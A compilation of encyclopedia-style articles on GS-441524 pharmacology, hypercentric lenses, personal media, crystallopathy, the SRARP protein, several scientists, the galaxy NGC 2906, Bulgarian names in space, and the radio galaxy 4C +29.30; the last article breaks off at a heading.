GS-441524 is similar to or more potent than remdesivir against SARS-CoV-2 in cell culture, and some researchers have argued that GS-441524 would be better than remdesivir for the treatment of COVID-19. Specific advantages cited include ease of synthesis, lower kidney toxicity and hepatotoxicity, and the potential for oral delivery (which is precluded for remdesivir because of poor hepatic stability and first-pass metabolism). The public health advocacy group Public Citizen, in an open letter, urged the DHHS and Gilead to investigate GS-441524 for the treatment of COVID-19, suggesting that Gilead was not doing so for financial motives related to the longer intellectual property lifespan of remdesivir, whose patents expire no sooner than 2035. Direct efficacy against SARS-CoV-2 was demonstrated in a mouse model of COVID-19.
GS-441524 has been directly administered to a healthy human, reaching peak plasma concentrations of 12 μM, more than 10 times the concentration required for activity against SARS-CoV-2 in culture.
USA regulations
GS-441524 is sold as a research chemical in very high purity (>99% by NMR and HPLC) by a number of suppliers. Such sales for research purposes do not constitute patent infringement, as affirmed by a U.S. Supreme Court decision. However, despite the high purity, under FDA regulations such chemicals are not allowed in clinical trials, since their manufacture is not performed under FDA cGMP-certified conditions.
Deuremidevir
A deuterium-modified version of GS-441524 has been produced by a team including members of the Wuhan Institute of Virology, and has shown pre-clinical efficacy in both cell culture and mouse models. A subsidiary of Shanghai Junshi Biosciences received conditional approval from China's National Medical Products Administration on January 30, 2023 for VV116, now named deuremidevir, to treat adults with COVID-19.
Pharmacology
Pharmacodynamics
The GS-441524 nucleoside is phosphorylated by nucleoside kinases (probably adenosine kinase (ADK), the enzyme that phosphorylates the structurally similar ribavirin), and then phosphorylated further by nucleoside-diphosphate kinase (NDK) to the active nucleoside triphosphate form. The triphosphate of GS-441524, GS-443902, is also the bioactive antiviral agent generated by remdesivir, but is generated from the latter by a different biochemical mechanism.
Pharmacokinetics
GS-441524 is a 1'-cyano-substituted adenosine analogue. It is remdesivir's predominant metabolite circulating in the serum due to rapid hydrolysis (half life less than 1 hour) followed by dephosphorylation.
In response to the letter from Public Citizen, the National Institutes of Health's drug discovery arm, the National Center for Advancing Translational Sciences (NCATS), started systematic Investigational New Drug-enabling experiments, including pharmacokinetics in multiple pre-clinical species and also (in October) in humans (results not yet published). Oral bioavailability was found to be excellent in dogs, good in mice, but modest in cynomolgus non-human primates. Prediction of human oral bioavailability from pre-clinical data is more art than science, and relies on modeling data from multiple species. Taking the clinical and pre-clinical data of other nucleoside analogues as a reference point, the human oral bioavailability of GS-441524 is expected to fall somewhere between that seen in dogs as a high point and that seen in non-human primates. Since GS-441524 has a bit less than half the molecular weight of remdesivir, a given mass contains roughly twice the molar amount; even if human oral bioavailability is only 50%, comparable to (for example) ribavirin, the same dose (for example, 100 mg) would deliver as much active metabolite to the blood as remdesivir. More recent data releases from NCATS show that GS-441524 is tolerated at 1000 mg/kg in dogs, with a maximum plasma concentration (Cmax) of nearly 100 μM, about 100-fold higher than the concentrations required for activity against the virus in cell culture.
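The molar-dose argument above can be illustrated with a back-of-the-envelope calculation. This is only a sketch: the molecular weights are approximate published values (remdesivir about 602.6 g/mol, GS-441524 about 291.3 g/mol), and the 50% oral bioavailability is the hypothetical figure used in the text, not a measured human value.

```python
# Rough molar comparison: 100 mg IV remdesivir vs 100 mg oral GS-441524.
MW_REMDESIVIR = 602.6  # g/mol, approximate
MW_GS441524 = 291.3    # g/mol, approximate

def mmol(dose_mg, mw):
    """Millimoles of drug contained in a dose given in milligrams."""
    return dose_mg / mw

iv_remdesivir = mmol(100, MW_REMDESIVIR)      # IV dose, taken as fully available
oral_gs441524 = 0.5 * mmol(100, MW_GS441524)  # oral dose at an assumed 50% bioavailability

# Because each GS-441524 molecule weighs a bit less than half as much,
# the oral dose still delivers at least as many moles as the IV dose.
print(f"{iv_remdesivir:.3f} mmol vs {oral_gs441524:.3f} mmol")  # 0.166 mmol vs 0.172 mmol
```

The same arithmetic scales to any dose, since both quantities are linear in the dose in milligrams.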
The elimination half-life of GS-441524 is around 2 hours in cynomolgus monkeys, much shorter than the 24 hours reported in humans. The longer human half-life suggests once-a-day dosing if the drug is approved for human oral use.
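The practical effect of this species difference follows from first-order elimination kinetics. The sketch below uses only the two half-lives quoted above; the dosing interpretation is illustrative, not a clinical recommendation.

```python
def remaining_fraction(t_hours, half_life_hours):
    """Fraction of drug remaining after t hours of first-order elimination."""
    return 0.5 ** (t_hours / half_life_hours)

# With the ~24 h half-life reported in humans, half the dose is still
# circulating at the next once-daily administration:
human = remaining_fraction(24, 24)       # 0.5

# With the ~2 h half-life seen in cynomolgus monkeys, essentially nothing
# remains after 24 h, which would rule out once-daily dosing:
monkey = remaining_fraction(24, 2)       # 0.5**12, about 0.00024

print(human, monkey)
```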
Mechanism of action
Intracellular triple-phosphorylation of GS-441524 yields its active 1'-cyano-substituted adenosine triphosphate analogue, which directly disrupts viral RNA replication by competing with endogenous NTPs for incorporation into nascent viral RNA transcripts and triggering delayed chain termination of RNA-dependent RNA polymerase.
Tolerance
In vitro experiments in Crandell–Rees feline kidney (CRFK) cells found GS-441524 nontoxic at 100 μM, 100 times the concentration effective at inhibiting FIPV replication in cultured CRFK cells and infected macrophages. Clinical trials in cats indicate the drug is well tolerated, with the primary side effect being dermal irritation from the acidity of the injection mix.
Some researchers suggesting its utility as a treatment for COVID-19 have pointed out advantages over remdesivir, including lack of on-target liver toxicity, longer half-life and exposure (AUC) and much cheaper and simpler synthesis.
See also
CMX521
NITD008
Notes
References
Anti–RNA virus drugs
Antiviral drugs
Nitriles
Nucleosides | GS-441524 | [
"Chemistry",
"Biology"
] | 1,725 | [
"Antiviral drugs",
"Nitriles",
"Biocides",
"Functional groups"
] |
63,832,562 | https://en.wikipedia.org/wiki/Hypercentric%20lens | A hypercentric or pericentric lens is a lens system where the entrance pupil is located in front of the lens, in the space where an object could be located. In a certain region, objects that are further away from the lens produce larger images than objects that are closer to the lens. This is in stark contrast to the behavior of the human eye or any ordinary camera (both entocentric lenses), where further-away objects always appear smaller.
The geometry of a hypercentric lens can be visualized by imagining a point source of light at the center of the entrance pupil sending rays in all directions. Any point on the object will be imaged to the point on the image plane found by continuing the ray that passes through it, so the shape of the image will be the same as the shadow cast by the object from the imaginary point of light. The closer an object gets to that point (the center of the entrance pupil), the larger its image will be.
This inversion of normal perspectivity can be useful for machine vision. Imagine a six-sided die sitting on a conveyor belt being imaged by a hypercentric lens system directly above, whose entrance pupil is below the conveyor belt. The image of the die would contain the top and all four sides at once, because the bottom of the die appears larger than the top.
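The point-projection ("shadow") picture above can be sketched numerically. In this simplified model, each object point is projected through the entrance-pupil centre onto the image plane, so magnification scales as one over the distance to the pupil centre. All the dimensions below (50 mm pupil depth below the belt, 200 mm pupil-to-image distance, 16 mm die) are made-up illustrative numbers, not an optical design.

```python
def shadow_magnification(dist_to_pupil_mm, pupil_to_image_mm):
    """Image size per unit object size in the point-projection model:
    rays from the entrance-pupil centre through the object point are
    continued to the image plane."""
    return pupil_to_image_mm / dist_to_pupil_mm

# A die on a conveyor belt, imaged from above by a hypercentric lens whose
# entrance pupil lies 50 mm below the belt; image plane 200 mm from the pupil.
DIE_SIZE_MM = 16
bottom = shadow_magnification(50, 200)                # bottom face: 4.0
top = shadow_magnification(50 + DIE_SIZE_MM, 200)     # top face: ~3.03

# The bottom face is closer to the pupil centre, so it images larger than
# the top face, which is why the top and all four sides fit in one image.
print(bottom > top)  # True
```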
See also
Entocentric lens
Telecentric lens
References
Photographic lenses
Machine vision | Hypercentric lens | [
"Engineering"
] | 293 | [
"Machine vision",
"Robotics engineering"
] |
63,834,055 | https://en.wikipedia.org/wiki/Personal%20media | Personal media are media of communication which are used by an individual rather than by a corporation or institution. They are generally contrasted with mass media which are produced by teams of people and broadcast to a general population. In other words, personal media allow individuals, as opposed to corporate entities, to contribute knowledge and opinion to the public. The term dates from the 1980s.
New technologies such as social media and self-publishing are creating a variety of modes for modern media. Marika Lüders suggests a two-dimensional model for classifying such media, with one dimension being the degree of interaction between senders and receivers, and the other the level of institutionalisation and professionalism.
Katherine Nashleanas links the concept of personal media to the notion of 'control' by an individual as opposed to a centralised authority. She argues that although personal media including the fax have been available to the general public since the 1960s, more recent technologies such as the smartphone confer greater control over content production and distribution to their users.
References
Digital media
Multimedia
New media
Social media
Social networks | Personal media | [
"Technology"
] | 217 | [
"New media",
"Digital media",
"Computing and society",
"Multimedia",
"Social media"
] |
63,834,727 | https://en.wikipedia.org/wiki/Crystallopathy | Crystallopathy is a harmful state or disease associated with the formation and aggregation of crystals in tissues or cavities, or in other words, a heterogeneous group of diseases caused by intrinsic or environmental microparticles or crystals, promoting tissue inflammation and scarring.
Composition
Crystallopathies can be associated with four main kinds of crystalline structures: liquid non-aggregating crystal solutions, amorphous nano-scale solid particles, crystalline micro-scale solid particles, and polycrystalline larger solid structures. They can be composed of various minerals, metabolites, proteins, and microparticles, including the following:
Location
In principle, crystal formation can happen anywhere in the body. Well-known places are excretory organs where concentrations get high easily, like in the biliary and urinary tracts, but crystalline structures are also formed in intracellular and extracellular spaces of tissues, like within the arterial wall in atherosclerosis.
For example, mechanical obstruction by mineral stones causes nephrolithiasis, urolithiasis, cholecystolithiasis, choledocholithiasis, and sialolithiasis, while acute inflammation caused by crystals in joints causes gout and pseudogout.
Renal diseases are also common in crystallopathies, including:
Mechanisms
Local supersaturation is a common trigger of crystallization, and once a crystal nucleus has formed, crystals can self-perpetuate, causing further crystallization and aggregation. The main mechanisms by which the formed crystals and aggregates cause pathological states, and ultimately disease, are acute necroinflammation, chronic tissue remodelling, and mechanical obstruction.
Necroinflammation is an autoamplifying process in which crystals are toxic to cells (cytotoxicity) and cause cell death (necrosis and regulated cell death) as well as a local and systemic inflammatory response. Cytotoxicity includes actin depolymerization, free radical and reactive oxygen species synthesis, and autophagy. Crystals can also directly activate inflammation via Mincle receptors, calcium and potassium signalling, calpains, cathepsin B, proteases, and NLRP3 inflammasomes.
Cells undergo cell death via three main mechanisms: necroptosis via RIPK1, FADD, RIPK3, and MLKL; ferroptosis via GPX4 suppression, system Xc suppression, and NADPH loss; and apoptosis via RIPK1 and caspase 8. These distressed cells then excrete alarmins, proteases, and damage-associated molecular patterns including HMGB1, histones, mitochondrial DNA, demethylated DNA and RNA, ATP, uric acid, and double-stranded DNA, which further activate Toll-like receptors and inflammasomes. Finally, this activates the inflammatory response, including the release of pro-inflammatory interleukin 1 alpha, interleukin 1 beta, cytokines, kinins, and lipid inflammatory mediators, complement system activation, vasodilation, an increase in endothelial permeability and leukocyte influx, and pain.
Macrophages are key cells that try to remove crystals from tissues by phagocytosis. As part of the inflammatory response, they undergo polarization into a pro-inflammatory state called M1. Macrophages can ingest particles of at most a few microns in diameter. If digestion of the crystalline material fails in the lysosomes, however, macrophages undergo autophagy, form foam cells and giant cells, and attempt extracellular digestion in a process called frustrated phagocytosis.
Crystals do not always cause acute inflammation but instead lead to chronic tissue remodelling. This process is possible because crystals get shielded from pro-inflammatory processes by compartmentalization (e.g. granuloma formation, fibrosis, and wound-healing) or molecular coating, or because inflammatory responses are suppressed with direct anti-inflammatory signalling (e.g. CLEC12A and NETosis).
Crystals can attach to membranes via annexin II, CD44, and osteopontin.
Interventions
The most straightforward treatment of crystallopathies would be dissolving the crystals. Crystal dissolvents have been under research, for example with cyclodextrin in atherosclerosis. Another approach would be to modify the inflammatory pathways common for crystallopathies with treatments such as IL-1a and IL-1b antagonists, NLRP3-antagonists, or blockers of ferroptosis and necroptosis. For protein-based crystallopathy, pharmacologic chaperones, protein stabilizing small molecules, and protein refolding agents have been under consideration.
References
Human diseases and disorders
Pathology
Rheumatology
Nephrology
Crystals | Crystallopathy | [
"Chemistry",
"Materials_science",
"Biology"
] | 1,019 | [
"Crystallography",
"Crystals",
"Pathology"
] |
63,834,837 | https://en.wikipedia.org/wiki/SRARP | Steroid Receptor Associated and Regulated Protein (SRARP) in humans is a protein encoded by a gene of the same name with two exons that is located on chromosome 1p36.13. SRARP contains 169 amino acids and has a molecular weight of 17,657 Da.
Expression and function in breast cancer
SRARP is co-expressed with the estrogen receptor (ER) and androgen receptor (AR) in breast cancer. In ER-positive breast cancer cells, SRARP is involved in the transcriptional activities of ER and interacts with ER, as shown by transient transfection of cells with SRARP and ER constructs. In addition, in AR-positive breast cancer cells, SRARP interacts with the endogenous AR protein and acts as a transcriptional corepressor of AR. Furthermore, activation of either AR or ER negatively regulates SRARP expression in breast cancer cells.
Tumor suppressor function in malignancies
SRARP and HSPB7 are a gene pair positioned 5 kb apart on chromosome 1p36.13. Notably, loss of chromosome 1p36.1 is common in malignancies, occurring in 34% of tumors. SRARP and HSPB7 are broadly inactivated in malignancies by epigenetic silencing, copy-number loss, and, less frequently, somatic mutations. In addition, overexpression of SRARP or HSPB7 has tumor suppressor effects in cancer cell lines. Another molecular feature shared by SRARP and HSPB7 is that both proteins interact with the 14-3-3 protein. Furthermore, analysis of large genomic datasets indicates that SRARP is a potential cancer biomarker and that SRARP inactivation predicts poor clinical outcome in malignancies and adjacent normal tissues.
References
Proteins | SRARP | [
"Chemistry"
] | 389 | [
"Biomolecules by chemical classification",
"Proteins",
"Molecular biology"
] |
63,836,450 | https://en.wikipedia.org/wiki/Joan%20van%20der%20Waals | Joan Henri van der Waals (2 May 1920 – 21 June 2022) was a Dutch physicist. He was professor of experimental physics at Leiden University between 1967 and 1989. He specialized in molecular physics and clathrate hydrates. One of Van der Waals's most significant contributions to the study of hydrates was a series of papers between 1953 and 1958, which eventually culminated in the 1959 publication of his paper on the canonical partition function for clathrates, along with J. C. Platteeuw. To create this partition function, van der Waals made a number of simplifying assumptions, most prominently that neighboring guest gas molecules cannot interact and there is a maximum of one guest per cage.
Early life
Van der Waals was born on 2 May 1920 in Amsterdam. A book on the Bohr model sparked his interest in physics. After finishing high school in Amsterdam he moved to London to work as an intern-apprentice in a laboratory. When he returned to the Netherlands he started a combined study of physics, chemistry and mathematics at the University of Amsterdam. With the German invasion of the Netherlands in May 1940, Van der Waals was called up for military service in the mounted artillery. He was made a prisoner of war but was allowed to return to his studies in June 1940. In 1942, Van der Waals completed the long-distance tour-skating event, the Elfstedentocht. In 1943 he refused to sign the loyalty declaration and went into hiding. He joined the underground courier service Rolls Royce. One of his activities was to make contact from The Hague with already liberated parts of the Netherlands to exchange communications. Van der Waals was caught by the authorities three times during the war, but managed to escape each time. Near the end of the war he went into hiding with family members living in the Veluwe region. When this area was liberated he was recruited as a translator for the Alsos Mission because he was able to speak German and English. In this capacity he was part of the liberation of Utrecht and saw the German technological facilities in Hook of Holland.
Career
After the war ended, Van der Waals finished his studies at the University of Amsterdam in October 1945. He then started working for the Koninklijke Shell Laboratorium Amsterdam. He obtained his doctorate at the University of Groningen in 1950, with a thesis titled Thermodynamic Properties of Mixtures of Alkanes Differing in Chain Length. In the 1950s, Van der Waals developed insights into the description of clathrates and hydrates related to noble gas compounds, resulting in the 1959 Van der Waals–Platteeuw clathrate hydrate theory. Van der Waals was appointed professor of experimental physics at Leiden University in 1967 and retired in 1989. He specialized in molecular physics.
In 1962, Van der Waals received the Bourke Award of the Royal Society of Chemistry. Van der Waals was elected a member of the Royal Netherlands Academy of Arts and Sciences (KNAW) in 1971. He served on the board of the KNAW between 1984 and 1987. He has been an honorary member of the Royal Netherlands Chemical Society since 1998. Van der Waals was appointed Knight in the Order of the Netherlands Lion.
Van der Waals was involved in the conservation and restoration of the Trippenhuis, the seat of the KNAW, from the 1980s onward.
Personal life
Van der Waals was married to Liesbeth van der Waals (1920–2014), with whom he had three children. In 1967 the pair separated. Van der Waals was the first cousin, twice removed, of Dutch Nobel Prize-winning physicist Johannes Diderik van der Waals. He was an avid sailor and made trips to the polar circle and Argentina.
Van der Waals turned 100 on 2 May 2020, and died on 21 June 2022, at the age of 102.
References
1920 births
2022 deaths
20th-century Dutch physicists
Dutch men centenarians
Dutch prisoners of war in World War II
Dutch resistance members
Experimental physicists
Knights of the Order of the Netherlands Lion
Academic staff of Leiden University
Members of the Royal Netherlands Academy of Arts and Sciences
Royal Netherlands Army personnel of World War II
Scientists from Amsterdam
University of Amsterdam alumni
University of Groningen alumni
World War II prisoners of war held by Germany | Joan van der Waals | [
"Physics"
] | 871 | [
"Experimental physics",
"Experimental physicists"
] |
63,836,749 | https://en.wikipedia.org/wiki/NGC%202906 | NGC 2906 is a spiral galaxy in the constellation Leo. It is circa 120 million light years from Earth, which, given its apparent dimensions, means that NGC 2906 is about 75,000 light years across. It was discovered by William Herschel on December 28, 1785.
The galaxy is characterised by a normal star formation rate, which has been calculated to be 0.8 per year. The total mass of the galaxy is estimated to be . A total of 241 HII regions have been identified in the galaxy.
One supernova has been observed in NGC 2906, SN 2005ip. The supernova was discovered by T. Boles on November 6, 2005, with a 0.35-m refractor, with an estimated apparent magnitude of 15.5, and was identified as a type II supernova, probably within a few weeks past explosion. As the supernova declined in brightness, it reached a plateau that lasted a bit more than two years, and its spectrum became dominated by narrow lines (type IIn), an unusual feature for supernovae that was attributed to the interaction of the supernova with dust located around it. It is also possible that the supernova created dust.
NGC 2906 is a member of a group of galaxies, the NGC 2894 group. Other galaxies identified as members of the group are NGC 2882, NGC 2894, and IC 450.
References
External links
Intermediate spiral galaxies
Leo (constellation)
2906
05081
27074
Astronomical objects discovered in 1785
Discoveries by William Herschel | NGC 2906 | [
"Astronomy"
] | 309 | [
"Leo (constellation)",
"Constellations"
] |
63,838,644 | https://en.wikipedia.org/wiki/Edward%20Marion%20Augustus%20Chandler | Edward Marion Augustus Chandler (April 10, 1887 – March 22, 1973) was the second African American to receive a Ph.D. in chemistry while studying at University of Illinois at Urbana–Champaign and was a founding faculty member at Roosevelt University in Chicago.
Early life and education
Chandler was the first of eight children born to Annie M. (née Onley) (1861–1909) and Henry Wilkins Chandler (1852–1938) in Ocala, Florida. Chandler's mother was a teacher from New York, and Chandler's father was the first Black graduate of Bates College in Maine who was an early African American lawyer, Florida state senator, and Republican Party Delegate.
After completing high school, Chandler attended Teachers' College of Howard University where he received his A.B. in Education in 1913. He then went to Clark University and obtained his M.S. in chemistry in 1914. His master's thesis was titled On the dynamics of ester by acids. He completed his Ph.D. in chemistry in 1917 under the guidance of Roger Adams at the University of Illinois, which made him the second African American to earn a Ph.D. in chemistry in the United States after St. Elmo Brady. His Ph.D. thesis was titled "The Molecular rearrangement of Carbon Compounds".
Career
After completing his Ph.D., he worked in the dye firm of Dicks, David and Heller Company until 1921. Then he worked at the pharmaceutical manufacturer Abbott Laboratories. In 1924 Chandler left Abbott to become a consulting chemist in Lake County, Illinois.
In 1945 Chandler was among the founding faculty of the new racially integrated Roosevelt College (now Roosevelt University). Other pioneers at the school included sociologist St. Clair Drake, modern dancer Sybil Shearer, and sociologist Rose Hum Lee. Chandler taught there for twenty years.
Professional memberships
American Chemical Society
Fellowship in Science
Phi Lambda Upsilon
Sigma Xi
Family
He married Arstella May Thorton on September 2, 1915. They had four children together: Dean T. Chandler (1917), Helen Marie Chandler (1920), Ruth Annette Chandler (1922), and Beverly Jane Chandler (1925).
See also
St. Elmo Brady - first African-American to obtain a PhD in chemistry in US (1916)
Percy Lavon Julian - third African-American to obtain a PhD in chemistry in US (1931)
Marie Maynard Daly - first female African-American to obtain a PhD in chemistry in US (1947)
List of African-American inventors and scientists
References
1887 births
1973 deaths
African-American chemists
20th-century American chemists
Clark University alumni
Howard University alumni
American organic chemists
Scientists from Florida
Scientists from Illinois
People from Ocala, Florida
20th-century African-American scientists
Chemists from Florida
University of Illinois College of Liberal Arts and Sciences alumni | Edward Marion Augustus Chandler | [
"Chemistry"
] | 563 | [
"Organic chemists",
"American organic chemists"
] |
63,838,721 | https://en.wikipedia.org/wiki/Bulgarian%20names%20in%20space | There are a number of objects in the solar system that have been named after Bulgarian people or places. Many of these are craters on the terrestrial planets but asteroids and exoplanets have also received Bulgarian names.
Venus
Budevska crater
Zdravka crater
Mars
Byala crater
Dulovo (crater)
Asteroids
2575 Bulgaria
4364 Shkodrov
11856 Nicolabonev
225232 Kircheva
253 Mathilde
Maritsa crater
References
External links
Българските имена в Космоса
Space program of Bulgaria
Astronomical nomenclature by country | Bulgarian names in space | [
"Astronomy"
] | 125 | [
"Astronomy stubs"
] |
63,839,346 | https://en.wikipedia.org/wiki/Susan%20Goldstine | Susan Goldstine is an American mathematician active in mathematics and fiber arts. She is a professor of mathematics at St. Mary's College of Maryland, and (for 2019–2022) the Steven Muller Distinguished Professor in the Sciences at St. Mary's College.
Education and career
Goldstine graduated summa cum laude from Amherst College in 1993. She completed a Ph.D. in mathematics at Harvard University in 1998. Her dissertation, Spin Representations and Lattices, was supervised by Benedict Gross.
After postdoctoral and visiting assistant professorships at McMaster University, Ohio State University, and Amherst College, she joined the St. Mary's College faculty in 2004.
Contributions
Goldstine has made and exhibited many pieces of mathematical art, often involving textiles. A set of bead crochet jewelry pieces by her visualizing the map coloring problem on three different manifolds won the prize for "best textile, sculpture, or other medium" in the art show of the 2015 Joint Mathematics Meetings.
She is the coauthor of the book Crafting Conundrums: Puzzles and Patterns for the Bead Crochet Artist (with Ellie Baker, A K Peters / CRC Press, 2014).
Combining her interests in mathematics and fiber arts she is one of 24 mathematicians and artists who make up the Mathemalchemy Team.
Personal life
Goldstine is the granddaughter of teacher and author Bel Kaufman and the great-great-granddaughter of Sholem Aleichem.
References
External links
Home page
Year of birth missing (living people)
Living people
20th-century American mathematicians
21st-century American mathematicians
Recreational mathematicians
Amherst College alumni
Harvard Graduate School of Arts and Sciences alumni
St. Mary's College of Maryland faculty
Mathematical artists
20th-century American women mathematicians
21st-century American women mathematicians | Susan Goldstine | [
"Mathematics"
] | 361 | [
"Recreational mathematics",
"Recreational mathematicians"
] |
76,944,753 | https://en.wikipedia.org/wiki/Craig%20Dunn | Craig P. Dunn is an American professor in the fields of business and sustainability. He is a professor in the management department at Western Washington University, where from 2016 to 2023 he served as Wilder Distinguished Professor of Business and Sustainability, an endowed professorship. Dunn attended California State University, Long Beach for his Bachelor of Science degree in business administration, California State University, Bakersfield for his Master of Business Administration, and Indiana University Bloomington for his Doctor of Philosophy. He formerly worked for San Diego State University, where he is now an associate professor, emeritus.
At Western Washington University, he served as dean of the College of Business and Economics from 2013 to 2016 before gaining his professorship. He was succeeded as dean by Scott Young. Dunn also serves on the faculty of the Institute for Energy Studies, on the Graduate Faculty Governance Council, and on the Lesbian, Gay, Bisexual & Transgender Advocacy Council. In 2021, Dunn had the highest salary of any university employee other than the president, Sabah Randhawa.
References
External links
Craig Dunn – WWU News
Living people
Year of birth missing (living people)
Missing middle or first names
American academics
American businesspeople
American education businesspeople
American energy industry businesspeople
Business school deans
Businesspeople in education
Energy economists
Sustainability scientists
California State University, Long Beach alumni
California State University, Bakersfield alumni
Indiana University Bloomington alumni
San Diego State University faculty
Western Washington University faculty | Craig Dunn | [
"Environmental_science"
] | 282 | [
"Sustainability scientists",
"Environmental scientists"
] |
76,952,322 | https://en.wikipedia.org/wiki/4C%20%2B29.30 | 4C +29.30 is an elliptical galaxy located in Cancer constellation. Its redshift is 0.064840 which corresponds to a light travel time of 850 million light-years from Earth. It is a wide-angled tailed radio galaxy (WAT) and a Seyfert galaxy.
An active galaxy
The nucleus of 4C +29.30 is found to be active. It is specifically classified as a Fanaroff-Riley class I (FR-I) radio galaxy producing an optical radio jet, although it also shows characteristics of a Fanaroff-Riley class II. 4C +29.30 shows weak extended emission with an angular size of ~520 arcsec (639 kpc), within which is embedded a compact, edge-brightened, double-lobed source of 29 arcsec (36 kpc). 4C +29.30 has been catalogued as an infrared point source by IRAS, WISE and the Two Micron All Sky Survey (2MASS).
The galaxy shows a complex X-ray morphology whose main features (a nucleus, a jet, hotspots and lobes) were detected during a snapshot 8 ks Chandra observation by Gambill et al. (2003). Its nucleus is found to be absorbed (N_H ≈ 3.95 (+0.27/−0.33) × 10²³ cm⁻²) with an unabsorbed luminosity of L(2–10 keV) ≈ (5.08 ± 0.52) × 10⁴³ erg s⁻¹, characteristic of a Seyfert type 2. Furthermore, it shows an early-type morphology and a moderate radio luminosity, presenting signatures of jet reactivation.
4C +29.30 is a particular subject of interest since multiple episodes of activity have been revealed by the morphology and spectral properties of its radio emission over a broad range of scales. It was first studied by van Breugel et al. (1986), who found optical line-emitting gas extending to ~20 arcsec north of the nucleus, adjacent to the radio jet along a position angle PA = 24°. There is evidence of the radio jet interacting with dense extranuclear gas, suggesting recent activity in 4C +29.30 following a merger with a gas-rich disk galaxy.
Extended emission in ionized gas, 4.3 kpc × 6.2 kpc in size, can be found in 4C +29.30, displaying structures that resemble rotated disks, spiral arms and bars, like a spiral galaxy of type Sc. The galaxy also displays a dust lane passing through its central region, similar to Centaurus A. According to Jamrozy et al. (2007), low-surface-brightness radio emission extending to ~600 kpc has been detected and studied, and its structure is characterized by a steep radio spectrum. The age of the small-scale radio structure embedded within the extended radio emission is estimated to be ≲ 100 Myr, with the inner double knots, of spectral age ≲ 33 Myr, resolved into two separate nuclear knots with spectral ages of ~15 yr and ~70 yr.
Observation of 4C +29.30
Between January 12 and March 15, 2016, 4C +29.30 was observed with the Integral Field Unit (IFU) of the Gemini Multi-Object Spectrograph, mounted on the Gemini North telescope. The "one-slit" mode was used, with a rectangular field of view of ≈3.5 arcsec × 5.0 arcsec, corresponding to 4.3 × 6.2 kpc² at the galaxy. At least 15 exposures of 1140 s were obtained, slightly shifted and dithered by up to 0.8 arcsec along both axes to correct detector effects after the combination of frames.
The spectra, with wavelength coverage in the range λ4500–7300 Å and centered at λ5900 Å, were obtained using the B600+_G5307 grating and the IFU-R mask. The spectral resolution is R ~ 3600 at ~λ3700 Å (~83 km s⁻¹), derived from the full width at half maximum (FWHM) of the CuAr emission lines. Spectral dithering was also performed, with a maximum separation of 102.5 Å between exposures. Data reduction was performed using IRAF packages provided by the Gemini Observatory, with a procedure consisting of sky and bias subtraction, flat-fielding, trimming, wavelength and relative flux calibration, building of the datacubes, and final alignment and average combination with sigma clipping into the final datacube, which has a spatial binning of 0.1 × 0.1 arcsec².
Estimating ionized gas properties of 4C +29.30
Thanks to the data provided, researchers were able to estimate the total mass of ionized hydrogen gas in 4C +29.30 as M ≈ 2.3 × 10⁵ L41(Hα)/n3 M⊙, where L41(Hα) is the Hα luminosity in units of 10⁴¹ erg s⁻¹ and n3 is the electron density in units of 10³ cm⁻³. The Hα luminosity was calculated by correcting the emitted flux for reddening, assuming the Cardelli et al. (1989) reddening law with RV = 3.1. The total mass outflow rate of 4C +29.30 was obtained within a ~3 kpc radius.
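The ionized-gas mass scaling above can be sketched numerically, assuming the standard form of the relation (mass proportional to Hα luminosity and inversely proportional to electron density). The input luminosity and density below are illustrative placeholders, not the measured values for 4C +29.30.

```python
# Ionized hydrogen mass from the Hα scaling relation quoted above:
#   M_HII ≈ 2.3e5 * L41 / n3 solar masses,
# with L41 = L(Hα) / 1e41 erg/s and n3 = ne / 1e3 cm^-3.

def ionized_gas_mass_msun(l_halpha_erg_s: float, n_e_cm3: float) -> float:
    """Ionized hydrogen mass in solar masses (illustrative sketch)."""
    l41 = l_halpha_erg_s / 1e41
    n3 = n_e_cm3 / 1e3
    return 2.3e5 * l41 / n3

# Placeholder inputs: L(Hα) = 1e41 erg/s and ne = 500 cm^-3
print(f"{ionized_gas_mass_msun(1e41, 500):.2e}")  # → 4.60e+05
```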
For the mass outflow rate and outflow kinetic power in the southern knot (SK), with a high blueshift (≈ −600 km s⁻¹), and the redshifted northern knot (NK) at ~1.4 arcsec from the nucleus, researchers adopted a biconical geometry for the outflowing gas. The outflow rate can be calculated as Ṁout = 1.4 ne mp vout A f, where mp = 1.7 × 10⁻²⁴ g is the proton mass, ne is the electron density, vout is the outflow velocity, A is the cone cross-section (base), f is the filling factor, and the factor of 1.4 accounts for elements heavier than hydrogen. Through the assumed geometry, they obtained an outflow cross-sectional area of A = 4.6 × 10⁴³ for both regions. The total mass outflow rates were then calculated for each knot separately, using the likely inclination of 40°. This gives a total mass outflow rate of Ṁout = 25.4 (+11.5/−7.5) M⊙/yr and an outflow kinetic power of Ė = 8.1 (+10.7/−4.0) erg/s. Compared to ionized-gas mass outflow rates in Seyfert galaxies, which lie in the range 0.1–10 M⊙/yr, the outflow in 4C +29.30 carries a higher mass of ionized gas.
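The outflow-rate formula can be evaluated directly. The sketch below uses the proton mass and cross-sectional area quoted above (the area is assumed here to be in cm²), while the density, velocity and filling factor are illustrative assumptions rather than the published fits.

```python
# Biconical outflow mass rate, Mdot = 1.4 * ne * mp * v_out * A * f,
# converted from g/s to solar masses per year. Constants follow the
# text above; ne, v_out and the filling factor f are illustrative.
M_P = 1.7e-24          # proton mass in g (value used in the article)
G_PER_MSUN = 1.989e33  # grams per solar mass
SEC_PER_YR = 3.156e7   # seconds per year

def outflow_rate_msun_yr(n_e_cm3: float, v_out_km_s: float,
                         area_cm2: float, filling: float) -> float:
    """Mass outflow rate in solar masses per year."""
    v_cm_s = v_out_km_s * 1e5                  # km/s -> cm/s
    mdot_g_s = 1.4 * n_e_cm3 * M_P * v_cm_s * area_cm2 * filling
    return mdot_g_s / G_PER_MSUN * SEC_PER_YR

# ne = 500 cm^-3, v = 600 km/s, A = 4.6e43 cm^2, f = 5e-4 (all assumed)
print(f"{outflow_rate_msun_yr(500, 600, 4.6e43, 5e-4):.1f}")  # → 26.1
```

With these placeholder inputs the result lands near the quoted ~25 M⊙/yr, showing the order of magnitude the formula produces.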
Sampling all of the collected data, the researchers found that the ionized-gas mass outflow rate and outflow kinetic power in 4C +29.30 are higher than estimates for radio galaxies such as 3C 293 and PKS 1345+12, while the kinetic power is comparable to that obtained for ESO 428-G14.
Black hole
